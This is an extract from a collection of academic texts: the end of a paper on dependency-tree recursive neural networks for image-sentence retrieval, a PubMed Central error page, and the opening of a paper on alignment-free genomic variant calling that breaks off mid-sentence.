standard deviation. The network was first trained using an unsuper- vised objective: trying to reconstruct the input while keeping the neurons sparse. In this phase, the net- work was trained on 20 million images randomly sampled from the web. We resized a given image so that its short dimension has 200 pixels. We then cropped a fixed size 200x200 pixel image right at the center of the resized image. This means we may dis- card a fraction of the long dimension of the image. After unsupervised training, we used Ima- geNet (Deng et al., 2009) to adjust the features in the entire network. The ImageNet dataset has 22,000 categories and 14 million images. The number of images in each category is equal across categories. The 22,000 categories are extracted from WordNet. To speed up the supervised training of this net- work, we made a simple modification to the algo- rithm described in Le et al. (2012): adding a “bottle- neck” layer in between the last layer and the classi- fier. to reduce the number of connections. We added one “bottleneck” layer which has 4,096 units in be- tween the last layer of the network and the softmax layer. This newly-added layer is fully connected to the previous layer and has a linear activation func- tion. The total number of connections of this net- work is approximately 1.36 billion. 212 The network was trained again using the super- vised objective of classifying the 22,000 classes in ImageNet. Most features in the networks are local, which allows model parallelism. Data parallelism by asynchronous SGD was also employed as in Le et al. (2012). The entire training, both unsupervised and supervised, took 8 days on a large cluster of ma- chines. This network achieves 18.3% precision@1 on the full ImageNet dataset (Release Fall 2011). We will use the features at the bottleneck layer as the feature vector z of an image. Each scaled and cropped image is presented to our network. The net- work then performs a feedforward computation to compute the values of the bottleneck layer. This means that every image is represented by a fixed length vector of 4,096 dimensions. Note that during training, no aligned sentence-image data was used and the ImageNet classes do not fully intersect with the words used in our dataset. 5 Multimodal Mappings The previous two sections described how we can map sentences into a d = 50-dimensional space and how to extract high quality image feature vectors of 4096 dimensions. We now define our final multi- modal objective function for learning joint image- sentence representations with these models. Our training set consists of N images and their feature vectors zi and each image has 5 sentence descrip- tions si1, . . . ,si5 for which we use the DT-RNN to compute vector representations. See Fig. 5 for ex- amples from the dataset. For training, we use a max- margin objective function which intuitively trains pairs of correct image and sentence vectors to have high inner products and incorrect pairs to have low inner products. Let vi = WIzi be the mapped image vector and yij = DTRNNθ(sij) the composed sen- tence vector. We define S to be the set of all sentence indices and S(i) the set of sentence indices corre- sponding to image i. Similarly, I is the set of all im- age indices and I(j) is the image index of sentence j. The set P is the set of all correct image-sentence training pairs (i,j). The ranking cost function to minimize is then: J(WI,θ) = ∑ (i,j)∈P ∑ c∈S\S(i) max(0, ∆ −vTi yj + vTi yc) + ∑ (i,j)∈P ∑ c∈I\I(j) max(0, ∆ −vTi yj + vTc yj), (5) where θ are the language composition matrices, and both second sums are over other sentences com- ing from different images and vice versa. The hyper- parameter ∆ is the margin. The margin is found via cross validation on the dev set and usually around 1. The final objective also includes the regulariza- tion term λ/left(‖θ‖22 + ‖WI‖F ). Both the visual model and the word vector learning require a very large amount of training data and both have a huge number of parameters. Hence, to prevent overfitting, we assume their weights are fixed and only train the DT-RNN parameters WI. If larger training corpora become available in the future, training both jointly becomes feasible and would present a very promis- ing direction. We use a modified version of Ada- Grad (Duchi et al., 2011) for optimization of both WI and the DT-RNN as well as the other baselines (except kCCA). Adagrad has achieved good perfor- mance previously in neural networks models (Dean et al., 2012; Socher et al., 2013a). We modify it by resetting all squared gradient sums to 1 every 5 epochs. With both images and sentences in the same multimodal space, we can easily query the model for similar images or sentences by finding the nearest neighbors in terms of negative inner products. An alternative objective function is based on the squared loss J(WI,θ) = ∑ (i,j)∈P ‖vi −yj‖22. This requires an alternating minimization scheme that first trains only WI, then fixes WI and trains the DT-RNN weights θ and then repeats this several times. We find that the performance with this ob- jective function (paired with finding similar images using Euclidean distances) is worse for all models than the margin loss of Eq. 5. In addition kCCA also performs much better using inner products in the multimodal space. 6 Experiments We use the dataset of Rashtchian et al. (2010) which consists of 1000 images, each with 5 sentences. See Fig. 5 for examples. We evaluate and compare the DT-RNN in three different experiments. First, we analyze how well the sentence vectors capture similarity in visual meaning. Then we analyze Image Search with Query Sentences: to query each model with a sen- tence in order to find an image showing that sen- 213 1. A woman and her dog watch the cameraman in their living with wooden floors. 2. A woman sitting on the couch while a black faced dog runs across the floor. 3. A woman wearing a backpack sits on a couch while a small dog runs on the hardwood floor next to her. 4. A women sitting on a sofa while a small Jack Russell walks towards the camera. 5. White and black small dog walks toward the camera while woman sits on couch, desk and computer seen in the background as well as a pillow, teddy bear and moggie toy on the wood floor. 1. A man in a cowboy hat check approaches a small red sports car. 2. The back and left side of a red Ferrari and two men admiring it. 3. The sporty car is admired by passer by. 4. Two men next to a red sports car in a parking lot. 5. Two men stand beside a red sports car. Figure 5: Examples from the dataset of images and their sentence descriptions (Rashtchian et al., 2010). Sentence length varies greatly and different objects can be mentioned first. Hence, models have to be invariant to word ordering. tence’s visual ‘meaning.’ The last experiment De- scribing Images by Finding Suitable Sentences does the reverse search where we query the model with an image and try to find the closest textual description in the embedding space. In our comparison to other methods we focus on those models that can also compute fixed, continu- ous vectors for sentences. In particular, we compare to the RNN model on constituency trees of Socher et al. (2011a), a standard recurrent neural network; a simple bag-of-words baseline which averages the words. All models use the word vectors provided by Huang et al. (2012) and do not update them as dis- cussed above. Models are trained with their corre- sponding gradients and backpropagation techniques. A standard recurrent model is used where the hidden vector at word index t is computed from the hidden vector at the previous time step and the current word vector: ht = f(Whht−1 + Wxxt). During training, we take the last hidden vector of the sentence chain and propagate the error into that. It is also this vector that is used to represent the sentence. Other possible comparisons are to the very differ- ent models mentioned in the related work section. These models use a lot more task-specific engineer- ing, such as running object detectors with bounding boxes, attribute classifiers, scene classifiers, CRFs for composing the sentences, etc. Another line of work uses large sentence-image aligned resources (Kuznetsova et al., 2012), whereas we focus on eas- ily obtainable training data of each modality sepa- rately and a rather small multimodal corpus. In our experiments we split the data into 800 train- ing, 100 development and 100 test images. Since there are 5 sentences describing each image, we have 4000 training sentences and 500 testing sen- tences. The dataset has 3020 unique words, half of which only appear once. Hence, the unsupervised, pre-trained semantic word vector representations are crucial. Word vectors are not fine tuned during train- ing. Hence, the main parameters are the DT-RNN’s Wl·,Wr· or the semantic matrices of which there are 141 and the image mapping WI. For both DT-RNNs the weight matrices are initialized to block identity matrices plus Gaussian noise. Word vectors and hid- den vectors are set o length 50. Using the develop- ment split, we found λ = 0.08 and the learning rate of AdaGrad to 0.0001. The best model uses a mar- gin of ∆ = 3. Inspired by Socher and Fei-Fei (2010) and Ho- dosh et al. (2013) we also compare to kernelized Canonical Correlation Analysis (kCCA). We use the average of word vectors for describing sentences and the same powerful image vectors as before. We use the code of Socher and Fei-Fei (2010). Tech- nically, one could combine the recently introduced deep CCA Andrew et al. (2013) and train the re- cursive neural network architectures with the CCA objective. We leave this to future work. With lin- ear kernels, kCCA does well for image search but is worse for sentence self similarity and describing images with sentences close-by in embedding space. All other models are trained by replacing the DT- RNN function in Eq. 5. 6.1 Similarity of Sentences Describing the Same Image In this experiment, we first map all 500 sentences from the test set into the multi-modal space. Then for each sentence, we find the nearest neighbor sen- 214 Sentences Similarity for Image Model Mean Rank Random 101.1 BoW 11.8 CT-RNN 15.8 Recurrent NN 18.5 kCCA 10.7 DT-RNN 11.1 SDT-RNN 10.5 Image Search Model Mean Rank Random 52.1 BoW 14.6 CT-RNN 16.1 Recurrent NN 19.2 kCCA 15.9 DT-RNN 13.6 SDT-RNN 12.5 Describing Images Model Mean Rank Random 92.1 BoW 21.1 CT-RNN 23.9 Recurrent NN 27.1 kCCA 18.0 DT-RNN 19.2 SDT-RNN 16.9 Table 1: Left: Comparison of methods for sentence similarity judgments. Lower numbers are better since they indicate that sentences describing the same image rank more highly (are closer). The ranks are out of the 500 sentences in the test set. Center: Comparison of methods for image search with query sentences. Shown is the average rank of the single correct image that is being described. Right: Average rank of a correct sentence description for a query image. tences in terms of inner products. We then sort these neighbors and record the rank or position of the nearest sentence that describes the same im- age. If all the images were very unique and the vi- sual descriptions close-paraphrases and consistent, we would expect a very low rank. However, usually a handful of images are quite similar (for instance, there are various images of airplanes flying, parking, taxiing or waiting on the runway) and sentence de- scriptions can vary greatly in detail and specificity for the same image. Table 1 (left) shows the results. We can see that averaging the high quality word vectors already cap- tures a lot of similarity. The chain structure of a standard recurrent neural net performs worst since its representation is dominated by the last words in the sequence which may not be as important as ear- lier words. 6.2 Image Search with Query Sentences This experiment evaluates how well we can find im- ages that display the visual meaning of a given sen- tence. We first map a query sentence into the vector space and then find images in the same space using simple inner products. As shown in Table 1 (center), the new DT-RNN outperforms all other models. 6.3 Describing Images by Finding Suitable Sentences Lastly, we repeat the above experiments but with roles reversed. For an image, we search for suitable textual descriptions again simply by finding close- by sentence vectors in the multi-modal embedding space. Table 1 (right) shows that the DT-RNN again outperforms related models. Fig. 2assigned to im- Image Search Model mRank BoW 24.7 CT-RNN 22.2 Recurrent NN 28.4 kCCA 13.7 DT-RNN 13.3 SDT-RNN 15.8 Describing Images Model mRank BoW 30.7 CT-RNN 29.4 Recurrent NN 31.4 kCCA 38.0 DT-RNN 26.8 SDT-RNN 37.5 Table 2: Results of multimodal ranking when models are trained with a squared error loss and using Euclidean dis- tance in the multimodal space. Better performance is reached for all models when trained in a max-margin loss and using inner products as in the previous table. ages. The average ranking of 25.3 for a correct sen- tence description is out of 500 possible sentences. A random assignment would give an average ranking of 100. 6.4 Analysis: Squared Error Loss vs. Margin Loss We analyze the influence of the multimodal loss function on the performance. In addition, we com- pare using Euclidean distances instead of inner prod- ucts. Table 2 shows that performance is worse for all models in this setting. 6.5 Analysis: Recall at n vs Mean Rank Hodosh et al. (2013) and other related work use re- call at n as an evaluation measure. Recall at n cap- tures how often one of the top n closest vectors were a correct image or sentence and gives a good intu- ition of how a model would perform in a ranking task that presents n such results to a user. Below, we compare three commonly used and high performing models: bag of words, kCCA and our SDT-RNN on 215 A gray convertible sports car is parked in front of the trees. A close-up view of the headlights of a blue old-fashioned car. Black shiny sports car parked on concrete driveway. Five cows grazing on a patch of grass between two roadways. A jockey rides a brown and white horse in a dirt corral. A young woman is riding a Bay hose in a dirt riding-ring. A white bird pushes a miniature teal shopping cart. A person rides a brown horse. A motocross bike with rider flying through the air. White propeller plane parked in middle of grassy field. The white jet with its landing gear down flies in the blue sky. An elderly woman catches a ride on the back of the bicycle. A green steam train running down the tracks. Steamy locomotive speeding thou the forest. A steam engine comes down a train track near trees. A double decker bus is driving by Big Ben in London. People in an outrigger canoe sail on emerald green water. Two people sailing a small white sail boat. behind a cliff, a boat sails away Tourist move in on Big Ben on a typical overcast London day. A group of people sitting around a table on a porch. A group of four people walking past a giant mushroom. A man and women smiling for the camera in a kitchen. A group of men sitting around a table drinking while a man behind stands pointing. Figure 6: Images and their sentence descriptions assigned by the DT-RNN. Image Search Model mRank 4 R@1 5 R@5 5 R@10 5 BoW 14.6 15.8 42.2 60.0 kCCA 15.9 16.4 41.4 58.0 SDT-RNN 12.5 16.4 46.6 65.6 Describing Images BoW 21.1 19.0 38.0 57.0 kCCA 18.0 21.0 47.0 61.0 SDT-RNN 16.9 23.0 45.0 63.0 Table 3: Evaluation comparison between mean rank of the closest correct image or sentence (lower is better 4) with recall at different thresholds (higher is better, 5). With one exception (R@5, bottom table), the SDT-RNN outperforms the other two models and all other models we did not include here. this different metric. Table 3 shows that the mea- sures do correlate well and the SDT-RNN also per- forms best on the multimodal ranking tasks when evaluated with this measure. 6.6 Error Analysis In order to understand the main problems with the composed sentence vectors, we analyze the sen- tences that have the worst nearest neighbor rank be- tween each other. We find that the main failure mode of the SDT-RNN occurs when a sentence that should describe the same image does not use a verb but the other sentences of that image do include a verb. For example, the following sentence pair has vectors that are very far apart from each other even though they are supposed to describe the same image: 1. A blue and yellow airplane flying straight down while emitting white smoke 2. Airplane in dive position Generally, as long as both sentences either have a verb or do not, the SDT-RNN is more robust to dif- ferent sentence lengths than bag of words represen- tations. 6.7 Model Analysis: Semantic Composition Matrices The best model uses composition matrices based on semantic relationships from the dependency parser. We give some insights into what the model learns by listing the composition matrices with the largest Frobenius norms. Intuitively, these matrices have learned larger weights that are being multiplied with the child vector in the tree and hence that child will have more weight in the final composed parent vec- tor. In decreasing order of Frobenius norm, the re- lationship matrices are: nominal subject, possession modifier (e.g. their), passive auxiliary, preposition at, preposition in front of, passive auxiliary, passive nominal subject, object of preposition, preposition in and preposition on. The model learns that nouns are very important as well as their spatial prepositions and adjectives. 7 Conclusion We introduced a new recursive neural network model that is based on dependency trees. For eval- uation, we use the challenging task of mapping sen- tences and images into a common space for finding one from the other. Our new model outperforms baselines and other commonly used models that can compute continuous vector representations for sen- tences. In comparison to related models, the DT- RNN is more invariant and robust to surface changes such as word order. 216 References G. Andrew, R. Arora, K. Livescu, and J. Bilmes. 2013. Deep canonical correlation analysis. In ICML, At- lanta, Georgia. K. Barnard, P. Duygulu, N. de Freitas, D. Forsyth, D. Blei, and M. Jordan. 2003. Matching words and pictures. JMLR. M. Baroni and A. Lenci. 2010. Distributional mem- ory: A general framework for corpus-based semantics. Computational Linguistics, 36(4):673–721. R. Collobert and J. Weston. 2008. A unified archi- tecture for natural language processing: deep neural networks with multitask learning. In Proceedings of ICML, pages 160–167. F. Costa, P. Frasconi, V. Lombardo, and G. Soda. 2003. Towards incremental parsing of natural language using recursive neural networks. Applied Intelligence. M. de Marneffe, B. MacCartney, and C. D. Manning. 2006. Generating typed dependency parses from phrase structure parses. In LREC. J. Dean, G. S. Corrado, R. Monga, K. Chen, M. Devin, Q. V. Le, M. Z. Mao, M. Ranzato, A. Senior, P. Tucker, K. Yang, and A.Y. Ng. 2012. Large scale distributed deep networks. In NIPS. J. Deng, W. Dong, R. Socher, L.-J. Li, K. Li, and L. Fei- Fei. 2009. ImageNet: A Large-Scale Hierarchical Im- age Database. In CVPR. J. Duchi, E. Hazan, and Y. Singer. 2011. Adaptive sub- gradient methods for online learning and stochastic op- timization. JMLR, 12, July. P. Duygulu, K. Barnard, N. de Freitas, and D. Forsyth. 2002. Object recognition as machine translation. In ECCV. A. Farhadi, M. Hejrati, M. A. Sadeghi, P. Young, C. Rashtchian, J. Hockenmaier, and D. Forsyth. 2010. Every picture tells a story: Generating sentences from images. In ECCV. Y. Feng and M. Lapata. 2013. Automatic caption gen- eration for news images. IEEE Trans. Pattern Anal. Mach. Intell., 35. A. Frome, G. Corrado, J. Shlens, S. Bengio, J. Dean, M. Ranzato, and T. Mikolov. 2013. Devise: A deep visual-semantic embedding model. In NIPS. C. Goller and A. Küchler. 1996. Learning task- dependent distributed representations by backpropaga- tion through structure. In Proceedings of the Interna- tional Conference on Neural Networks. E. Grefenstette, G. Dinu, Y.-Z. Zhang, M. Sadrzadeh, and M. Baroni. 2013. Multi-step regression learning for compositional distributional semantics. In IWCS. A. Gupta and L. S. Davis. 2008. Beyond nouns: Exploit- ing prepositions and comparative adjectives for learn- ing visual classifiers. In ECCV. M. Hodosh, P. Young, and J. Hockenmaier. 2013. Fram- ing image description as a ranking task: Data, mod- els and evaluation metrics. J. Artif. Intell. Res. (JAIR), 47:853–899. E. H. Huang, R. Socher, C. D. Manning, and A. Y. Ng. 2012. Improving Word Representations via Global Context and Multiple Word Prototypes. In ACL. K. Jarrett, K. Kavukcuoglu, M.A. Ranzato, and Y. Le- Cun. 2009. What is the best multi-stage architecture for object recognition? In ICCV. P. Blunsom. K.M. Hermann. 2013. The role of syntax in vector space models of compositional semantics. In ACL. A. Krizhevsky, I. Sutskever, and G. E. Hinton. 2012. Imagenet classification with deep convolutional neural networks. In NIPS. G. Kulkarni, V. Premraj, S. Dhar, S. Li, Y. Choi, A. C. Berg, and T. L. Berg. 2011. Baby talk: Understanding and generating image descriptions. In CVPR. N. Kumar, A. C. Berg, P. N. Belhumeur, , and S. K. Na- yar. 2009. Attribute and simile classifiers for face ver- ification. In ICCV. P. Kuznetsova, V. Ordonez, A. C. Berg, T. L. Berg, and Yejin Choi. 2012. Collective generation of natural image descriptions. In ACL. Q. V. Le, M.A. Ranzato, R. Monga, M. Devin, K. Chen, G.S. Corrado, J. Dean, and A. Y. Ng. 2012. Build- ing high-level features using large scale unsupervised learning. In ICML. T. Mikolov, W. Yih, and G. Zweig. 2013. Linguistic regularities in continuous spaceword representations. In HLT-NAACL. J. Mitchell and M. Lapata. 2010. Composition in dis- tributional models of semantics. Cognitive Science, 34(8):1388–1429. J. Ngiam, A. Khosla, M. Kim, J. Nam, H. Lee, and A.Y. Ng. 2011. Multimodal deep learning. In ICML. V. Ordonez, G. Kulkarni, and T. L. Berg. 2011. Im2text: Describing images using 1 million captioned pho- tographs. In NIPS. J. B. Pollack. 1990. Recursive distributed representa- tions. Artificial Intelligence, 46, November. C. Rashtchian, P. Young, M. Hodosh, and J. Hocken- maier. 2010. Collecting image annotations using Amazon’s Mechanical Turk. In Workshop on Creat- ing Speech and Language Data with Amazon’s MTurk. R. Socher and L. Fei-Fei. 2010. Connecting modalities: Semi-supervised segmentation and annotation of im- ages using unaligned text corpora. In CVPR. R. Socher, C. D. Manning, and A. Y. Ng. 2010. Learning continuous phrase representations and syntactic pars- ing with recursive neural networks. In Proceedings of the NIPS-2010 Deep Learning and Unsupervised Fea- ture Learning Workshop. 217 R. Socher, E. H. Huang, J. Pennington, A. Y. Ng, and C. D. Manning. 2011a. Dynamic Pooling and Unfold- ing Recursive Autoencoders for Paraphrase Detection. In NIPS. R. Socher, C. Lin, A. Y. Ng, and C.D. Manning. 2011b. Parsing Natural Scenes and Natural Language with Recursive Neural Networks. In ICML. R. Socher, J. Pennington, E. H. Huang, A. Y. Ng, and C. D. Manning. 2011c. Semi-Supervised Recursive Autoencoders for Predicting Sentiment Distributions. In EMNLP. R. Socher, B. Huval, C. D. Manning, and A. Y. Ng. 2012. Semantic Compositionality Through Recursive Matrix-Vector Spaces. In EMNLP. R. Socher, J. Bauer, C. D. Manning, and A. Y. Ng. 2013a. Parsing With Compositional Vector Grammars. In ACL. R. Socher, M. Ganjoo, C. D. Manning, and A. Y. Ng. 2013b. Zero-Shot Learning Through Cross-Modal Transfer. In NIPS. R. Socher, M. Ganjoo, H. Sridhar, O. Bastani, and A. Y. Ng. C. D. Manning and. 2013c. Zero-shot learn- ing through cross-modal transfer. In Proceedings of the International Conference on Learning Representa- tions (ICLR, Workshop Track). N. Srivastava and R. Salakhutdinov. 2012. Multimodal learning with deep boltzmann machines. In NIPS. A. Torralba, K. P. Murphy, and W. T. Freeman. 2010. Using the forest to see the trees: exploiting context for visual object detection and localization. Communica- tions of the ACM. P. D. Turney and P. Pantel. 2010. From frequency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research, 37:141–188. B. Yao, X. Yang, L. Lin, M. W. Lee, and S.-C. Zhu. 2010. I2t:image parsing to text description. IEEE Xplore. 218 work_mgv666kn3fcufdf2mxqysdu35m ---- wp-p1m-39.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-39.ebi.ac.uk no 265365159 Params is empty 265365159 exception Params is empty 2021/04/06-17:58:14 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265365159 (wp-p1m-39.ebi.ac.uk) Time: 2021/04/06 17:58:14 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_mhhvvbsh2vawzcijtr33odztki ---- Submitted 30 December 2015 Accepted 25 May 2016 Published 25 July 2016 Corresponding author Justin Bedo, cu@cua0.org Academic editor Mireille Regnier Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.71 Copyright 2016 Bedo et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Information theoretic alignment free variant calling Justin Bedo1,2, Benjamin Goudey1,3, Jeremy Wazny1 and Zeyu Zhou1,4 1 IBM Research—Australia, Carlton, VIC, Australia 2 Department of Computing and Information Systems, The University of Melbourne, Parkville, VIC, Australia 3 Centre For Epidemiology and Biostatistics, The University of Melbourne, Parkville, VIC, Australia 4 School of Mathematics and Statistics, The University of Melbourne, Parkville, VIC, Australia ABSTRACT While traditional methods for calling variants across whole genome sequence data rely on alignment to an appropriate reference sequence, alternative techniques are needed when a suitable reference does not exist. We present a novel alignment and assembly free variant calling method based on information theoretic principles designed to detect variants have strong statistical evidence for their ability to segregate samples in a given dataset. Our method uses the context surrounding a particular nucleotide to define variants. Given a set of reads, we model the probability of observing a given nucleotide conditioned on the surrounding prefix and suffixes of length k as a multinomial distribution. We then estimate which of these contexts are stable intra-sample and varying inter-sample using a statistic based on the Kullback–Leibler divergence. The utility of the variant calling method was evaluated through analysis of a pair of bacterial datasets and a mouse dataset. We found that our variants are highly informa- tive for supervised learning tasks with performance similar to standard reference based calls and another reference free method (DiscoSNP++). Comparisons against reference based calls showed our method was able to capture very similar population structure on the bacterial dataset. The algorithm’s focus on discriminatory variants makes it suitable for many common analysis tasks for organisms that are too diverse to be mapped back to a single reference sequence. Subjects Bioinformatics, Computational Biology Keywords Alignment free, Variant, Assembly free, Genome, Acteria, Feature extraction INTRODUCTION Many sequencing studies begin by the transformation of raw sequence data to relatively few features, usually single-nucleotide variants. Typically, this is done by aligning the individual sequence reads to a reference genome to identify single nucleotide differences from the reference. Although straightforward, the genome alignment approach has several shortcomings: • A suitable reference may not exist; this is especially important for unstable genomes such the anuploid genomes frequently encountered in cancer (Beroukhim et al., 2010), and also for some organisms with large genetic diversity such as bacteria (Ochman, Lawrence & Groisman, 2000); How to cite this article Bedo et al. (2016), Information theoretic alignment free variant calling. PeerJ Comput. Sci. 2:e71; DOI 10.7717/peerj-cs.71 https://peerj.com mailto:cu@cua0.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.71 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.71 • Selecting a reference may be difficult when there is uncertainty about what has been sampled; and • It performs poorly when a sample contains significant novel material, i.e., sequences that are not simple variations of the reference. Existing reference-free approaches are either based on assembly (Li, 2012), which possibly introduces misassembly biases, or on searching for structural motifs within a universal de Bruijn graph of all samples (Peterlongo et al., 2010; Iqbal et al., 2012; Uricaru et al., 2015) that correspond to simple variants. We present a variant calling algorithm to generate features from unaligned raw reads. Rather than attempting to identify all genetic variation within a given set of samples, we instead focus on selected variants that have have strong statistical evidence for their ability to segregate samples in a given dataset. Such variants form useful features for many tasks including genomic prediction of a given phenotype, modelling population structure or clustering samples into related groups. Our method uses the context surrounding a particular nucleotide to define variants. Given a set of reads, we model the probability of observing a given nucleotide conditioned on the surrounding prefix and suffix nucleotide sequences of length k as a multinomial distribution. We then estimate which of these contexts form potential variants, i.e., those that are stable intra-sample and varying inter-sample, using a statistic based on the Kullback–Leibler divergence. Given this list of candidate variants, we call those variants by maximum likelihood of our multinomial model. Furthermore, we show that the size of the context k can be chosen using the minimum message length principle (Wallace & Boulton, 1968) and that our context selection statistic is γ-distributed. Consequently, k can be determined from the data and the contexts surrounding variants can be selected with statistical guarantees on type-1 errors. The utility of variant calling method was evaluated through simulation experiments and empirical analysis of a pair of bacterial datasets and a mouse dataset. Through simulations we showed the method has good power and false positive rate for detecting variants, though the ability to detect rare variants required high depth and large number of samples. Our empirical results indicated our variants are highly informative for antimicrobial resistance phenotypes on the bacterial datasets and were able to accurately capture population structure. On the mouse dataset, the variants were also found to be good for modelling coat colour. Further investigations of the variants found for the bacterial dataset using a known reference sequence revealed variants associated with boxB repeat regions, a repeat previously used for population structure mapping (Rakov, Ubukata & Robinson, 2011), suggesting the model can generate features for more complex genetic elements. These results suggest the variants are capturing genotypic variation well and can model heritable traits in different organisms. Our proposed method will be of strongest utility when modelling of population structure, phylogenetic relationships or phenotypes from genotype for large scale datasets of organisms with either variable genomes (as is the case for many bacteria), or those lacking a reference genome. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 METHODS Our variant calling method comprises two steps: modelling the probability that a base is observed in a sample given the surrounding context; and determining which contexts surround variable bases in a population represented by several samples. The former provides a mechanism to call variants in a sample given a set of contexts, and the latter determines the set of contexts associated with variants. Variant calling We consider the case of variant calling directly from a collection of reads. Let random variable xij taking values in {A,C,G,T} denote the jth nucleotide of the ith read, with 1≤ i≤n and 1≤ j≤mi the number of reads and nucleotides in the read i. Definition 1 (k-context): The k-context around a nucleotide j consists of a k-prefix sequence πk(xi,j) :=[xi(j−k),xi(j−k+1),...,xi(j−1)] and a k-suffix sequence σk(xi,j) :=[xi(j+1),xi(j+2),...,xi(j+k)]. Contexts that consist of only the prefix/suffix sequences are suffix/prefix-free. Definition 2 (k-context probability): The k-context probability is the probability of observing a base at a particular position given the context, that is P(xij|πk(xi,j),σk(xi,j)). The k-context probabilities can be estimated from the data by maximising a pseudolikelihood. Let f (b,πk,σk) :=1+ ∑ ijJxij =b∧πk =πk(xi,j)∧σk =σk(xi,j)K denote the counts of how often b was observed with k-prefix πk and k-suffix σk in the read set x, where J·K is the Iverson bracket. Here the pseudocount encodes a weak uniform prior. The probability density estimate of observing a base b in context (πk,σk) is then given by P̂(b|πk,σk) := f (b,πk,σk)∑ b′ f (b ′,πk,σk) . The suffix/prefix free densities are thus P̂(b|πk)= ∑ σk P̂(b|πk,σk) and P̂(b|σk)= ∑ πk P̂(b|πk,σk). Given a context (πk,σk), the base can be called as argmaxbP̂(b|πk,σk), and similarly for prefix/suffix free densities. Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 Variant finding Determining the list of variants consists of determining which contexts (πk,σk) surround a variable base in our population, then call the base for each variant-defining context and each sample. We consider inter-sample variants and not intra-sample variants; we are interested in finding contexts which define variants that differ amongst samples and are not attributable to noise. In this section, we develop a statistic based on the Kullback–Leibler (KL) divergence that achieves these two points. Let X be a set of samples, each consisting of a collection of reads as defined above. For each x ∈X , we refer to the jth nucleotide of the ith read as xij, the number of reads in the sample as nx, and the number of nucleotides in read xi as mxi. Similarly to the previous section, we denote fx(b,πk,σk) as the frequency of observing base b given context (πk,σk) for sample x. As before, a pseudocount is used when estimating fx to encode a uniform prior. The KL divergence measure provides a way of quantifying the differences between two probability distributions. We will develop a statistic based upon the KL-divergence that compares the individual sample distributions of nucleotide occurrence for a given context with a global expected distribution. Contexts that significantly diverge from the global expected distribution surround a site which is variant in the population sample. Definition 3 (Kullback–Leibler divergence): Let P and Q be two discrete probability densities over the domain Y . The Kullback–Leibler (KL) divergence is P(·)‖klQ(·) := ∑ y∈Y P(y)log P(y) Q(y) . Definition 4 (Total divergence): The total divergence for a given context (πk,σk) is estimated as the total KL divergence between the samples in the dataset X and the expected probability distribution given the context: DX (πk,σk) := ∑ x∈X P̂x(·|πk,σk)‖klQ(·|πk,σk), where P̂x(·|πk,σk) := fx(b,πk,σk)∑ b′ fx(b ′,πk,σk) denotes the probability density estimated for sample x and context (πk,σk) and Q(b|πk,σk) := ∑ x∈X fx(b,πk,σk)∑ x∈X ,b′ fx(b ′,πk,σk) . The total divergence statistic is proportional to the expected KL-divergence between a sample and the global expected probability distribution. To see why this statistic is robust to noise, consider the case where variation is due purely to noise. As the noise distribution is independent of sample, it will be well modelled by the expected distribution Q and Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 therefore the divergence between each sample and Q will be small. Conversely, if variation is due to samples being drawn from two or more latent probability densities, then Q will be an average of these latent densities and divergence will be high. The next theorem is crucial for determining when a particular divergence estimate indicates a significant divergence from the expected distribution Q. Using this theorem, we can use hypothesis testing to select which contexts are not well explained by Q. These contexts not well explained by Q are variant and we call them as in ‘Variant calling.’ Theorem 5. Under random sampling from Q, D follows a γ distribution. The proof of this theorem is trivial given a well known result regarding the G-test (see Sokal & Rohlf (1994)). Lemma 6 Let fx be a frequency function and g :=E[fx]. The G-test is G := ∑ x∈X ∑ b∈{A,T,C,G} fx(b,πk,σk)log ( fx(b,πk,σk) g(b,πk,σk) ) . Under the null hypothesis that fx results from random sampling from a distribution with exp- ected frequencies g, G follows a χ2 distribution with 3|X |degrees of freedom asymptotically. From this lemma, the proof of Theorem 5 follows easily: Proof. D is proportional to the G-test. As the G-test isχ2-distributed, D isγ-distributed. � Clearly our statistic D is very similar to G, but has an important property: D is invariant to coverage. As D operates on estimates of the probability rather than the raw counts, changes in coverage are effectively normalised out. This is advantageous for variant discovery as it avoids coverage bias and allows variants to be called for (proportionally) low-coverage areas, if statistical support for their variability in the population exists. To select contexts, aγ distribution is fitted to the data. For the results in our experiments, we used a Bayesian mixture model with a β prior over the mixing weights whereby each context could originate from the null (γ) distribution or from a uniform distribution. The mixing weights were then used to determine if a context is not well supported by the null distribution. Such a model comparison procedure has several advantages and directly estimates the probabilities of support by the data for each context (Kamary et al., 2014), providing an easily interpretable quantity. Choosing context size The problem of choosing context size k is difficult; if too large then common structures will not be discovered, and if too small then base calling will be unreliable. We propose to choose k using the minimum message length principle (Wallace & Boulton, 1968). Consider a given sample x. The message length of a two-part code is the length of the compressed message plus the length of the compressor/decompresser. In our case, the length of the compressed message is given by the entropy of our above probability Bedo et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.71 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.71 distribution: L(x;P̂(·|πk,σk)) :=− ∑ ij logP̂(xij|πk,σk). The compressor/decompresser is equivalent to transmitting the counts for the probability distribution. This can be thought of as transmitting a k length tuple of counts. Let N = 